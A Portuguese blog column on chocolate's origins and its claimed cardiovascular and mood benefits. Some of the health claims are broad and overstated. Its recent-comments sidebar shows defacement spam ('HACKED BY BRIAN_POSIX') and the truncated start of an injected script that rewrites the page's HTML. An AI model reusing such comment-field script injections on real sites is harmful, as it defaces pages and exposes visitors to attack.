Nesta rubrica vamos falar do chocolate, produto muito apreciado composto essencialmente por cacau e manteiga de cacau. Estes dois ingredientes provêem da semente do cacaueiro – Theobroma cacao, significando Theobroma “alimento dos deuses”, que eram usadas pelos Maias e Astecas para fazerem uma bebida revigorante a que davam o nome de “Xocolatl” (xocoll=amargo e atl=água), precursor do nosso chocolate.

No Congresso europeu de cardiologia de 2011, foi apresentado um trabalho acerca dos efeitos benéficos do chocolate, os quais provêm do cacau na sua mistura, rico em polifenóis. Um consumo diário de chocolate (com pelo menos 70% de cacau) mostrou reduzir o risco cardiovascular em cerca de 30%, bem como melhorar a diabetes.

Os benefícios atribuídos ao chocolate devem-se à presença do cacau na sua composição. Os flavonóides encontrados no cacau (potentes antioxidantes naturais), que segundo alguns estudos é maior que a quantidade encontrada no chá e no vinho, possuem um efeito anti-inflamatório, anti-plaquetário e antioxidante, diminuindo o risco de desenvolver doenças cardiovasculares, contribuindo para o controle da tensão arterial e retardando o envelhecimento, ao combaterem os radicais livres que danificam vários tecidos.

Acresce que o chocolate contém pequenas quantidades de compostos estimulantes como a teobromina (semelhante à cafeína), induz a produção de serotonina, com ligação ao humor, aumentando ainda os níveis de endorfina no cérebro (opiáceo natural) relacionada com a sensação de bem-estar e euforia.


Tags:

Facebook Like

Pub
Rubricas
Comentários recentes
Kd o vídeo?
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...
HACKED BY BRIAN_POSIXHACKED BY BRIAN_POSIXHACKED B...
Hacked By Brian_posix !!SIC MULHER PWNED BY BPOSIX...
document.documentElement.innerHTML=unescape("Hacke...
Amei <3 mt
https://m.facebook.com/Veredictod1amor/insights/
Acabei de o receber, muito obrigada!
Pesquisar
 
blogs SAPO